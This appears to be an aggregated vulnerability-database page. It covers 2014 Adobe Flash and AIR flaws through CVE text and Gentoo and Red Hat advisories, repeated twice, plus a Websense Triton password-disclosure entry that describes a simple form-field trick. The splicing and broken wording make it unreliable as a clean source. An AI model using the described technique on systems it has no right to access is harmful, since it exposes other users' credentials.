Buffer overflow in Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allows attackers to execute arbitrary code via unspecified vectors. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the usage of regular expressions in ActionScript where an expression could overflow a data structure on the stack. An attacker can leverage this vulnerability to execute code under the context of the current process. Failed exploit attempts likely result in denial-of-service conditions. Adobe AIR is a cross-operating system runtime environment that can be used to build and configure cross-platform desktop RIA (Rich Internet Applications) applications. Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Furthermore, a remote attacker may be able to bypass the Same Origin Policy or read the clipboard via unspecified vectors. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.356" References ========== [ 1 ] CVE-2014-0498 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0498 [ 2 ] CVE-2014-0499 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0499 [ 3 ] CVE-2014-0502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0502 [ 4 ] CVE-2014-0503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0503 [ 5 ] CVE-2014-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0504 [ 6 ] CVE-2014-0506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0506 [ 7 ] CVE-2014-0507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0507 [ 8 ] CVE-2014-0508 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0508 [ 9 ] CVE-2014-0509 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0509 [ 10 ] CVE-2014-0515 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0515 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201405-04.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:0380-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0380.html Issue date: 2014-04-09 CVE Names: CVE-2014-0506 CVE-2014-0507 CVE-2014-0508 CVE-2014-0509 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-09, listed in the References section. Two flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0506, CVE-2014-0507) A flaw in flash-plugin could allow an attacker to obtain sensitive information if a victim were tricked into visiting a specially crafted web page. (CVE-2014-0508) A flaw in flash-plugin could allow an attacker to conduct cross-site scripting (XSS) attacks if a victim were tricked into visiting a specially crafted web page. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1085581 - CVE-2014-0506 CVE-2014-0507 flash-plugin: two flaws leading to code execution (APSB14-09) 1085585 - CVE-2014-0508 flash-plugin: information disclosure flaw (APSB14-09) 1085586 - CVE-2014-0509 flash-plugin: cross-site scripting flaw (APSB14-09) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.350-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.350-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.350-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.350-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.350-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.350-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.350-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.350-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.350-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.350-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0506.html https://www.redhat.com/security/data/cve/CVE-2014-0507.html https://www.redhat.com/security/data/cve/CVE-2014-0508.html https://www.redhat.com/security/data/cve/CVE-2014-0509.html https://access.redhat.com/security/updates/classification/#critical https://helpx.adobe.com/security/products/flash-player/apsb14-09.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFTRQk9XlSAg2UNWIIRAksjAKCbnm4UGitMzrcZoEuifY3AS5L9hQCdH2Ou CgUxC7S1jhlSSEYdIzvdiL8= =tqNu -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 11.7.700.275 and 11.8.x through 13.0.x before 13.0.0.182 on Windows and OS X and before 11.2.202.350 on Linux, Adobe AIR before 13.0.0.83 on Android, Adobe AIR SDK before 13.0.0.83, and Adobe AIR SDK & Compiler before 13.0.0.83 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. An attacker may leverage this issue to execute arbitrary script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Adobe AIR is a cross-operating system runtime environment that can be used to build and configure cross-platform desktop RIA (Rich Internet Applications) applications. A remote attacker can exploit this vulnerability to inject arbitrary web script or HTML. Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Furthermore, a remote attacker may be able to bypass the Same Origin Policy or read the clipboard via unspecified vectors. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.356" References ========== [ 1 ] CVE-2014-0498 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0498 [ 2 ] CVE-2014-0499 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0499 [ 3 ] CVE-2014-0502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0502 [ 4 ] CVE-2014-0503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0503 [ 5 ] CVE-2014-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0504 [ 6 ] CVE-2014-0506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0506 [ 7 ] CVE-2014-0507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0507 [ 8 ] CVE-2014-0508 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0508 [ 9 ] CVE-2014-0509 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0509 [ 10 ] CVE-2014-0515 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0515 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201405-04.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:0380-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0380.html Issue date: 2014-04-09 CVE Names: CVE-2014-0506 CVE-2014-0507 CVE-2014-0508 CVE-2014-0509 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. These vulnerabilities are detailed in the Adobe Security Bulletin APSB14-09, listed in the References section. Two flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0506, CVE-2014-0507) A flaw in flash-plugin could allow an attacker to obtain sensitive information if a victim were tricked into visiting a specially crafted web page. (CVE-2014-0508) A flaw in flash-plugin could allow an attacker to conduct cross-site scripting (XSS) attacks if a victim were tricked into visiting a specially crafted web page. (CVE-2014-0509) All users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 11.2.202.350. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258 5. Bugs fixed (https://bugzilla.redhat.com/): 1085581 - CVE-2014-0506 CVE-2014-0507 flash-plugin: two flaws leading to code execution (APSB14-09) 1085585 - CVE-2014-0508 flash-plugin: information disclosure flaw (APSB14-09) 1085586 - CVE-2014-0509 flash-plugin: cross-site scripting flaw (APSB14-09) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.350-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.350-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.350-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.350-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.350-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.350-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.350-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.350-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.350-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.350-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0506.html https://www.redhat.com/security/data/cve/CVE-2014-0507.html https://www.redhat.com/security/data/cve/CVE-2014-0508.html https://www.redhat.com/security/data/cve/CVE-2014-0509.html https://access.redhat.com/security/updates/classification/#critical https://helpx.adobe.com/security/products/flash-player/apsb14-09.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFTRQk9XlSAg2UNWIIRAksjAKCbnm4UGitMzrcZoEuifY3AS5L9hQCdH2Ou CgUxC7S1jhlSSEYdIzvdiL8= =tqNu -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

The Settings module in Websense Triton Unified Security Center 7.7.3 before Hotfix 31, Web Filter 7.7.3 before Hotfix 31, Web Security 7.7.3 before Hotfix 31, Web Security Gateway 7.7.3 before Hotfix 31, and Web Security Gateway Anywhere 7.7.3 before Hotfix 31 allows remote authenticated users to read cleartext passwords by replacing type="password" with type="text" in an INPUT element in the (1) Log Database or (2) User Directories component. Websense Provided by TRITON Unified Security Center Contains an information disclosure vulnerability. CWE-200: Information Exposure http://cwe.mitre.org/data/definitions/200.htmlA user who has some account of the product may obtain the authentication information of other users. are all products of American Websense. A remote attacker can exploit this vulnerability to read plaintext passwords by replacing type='password'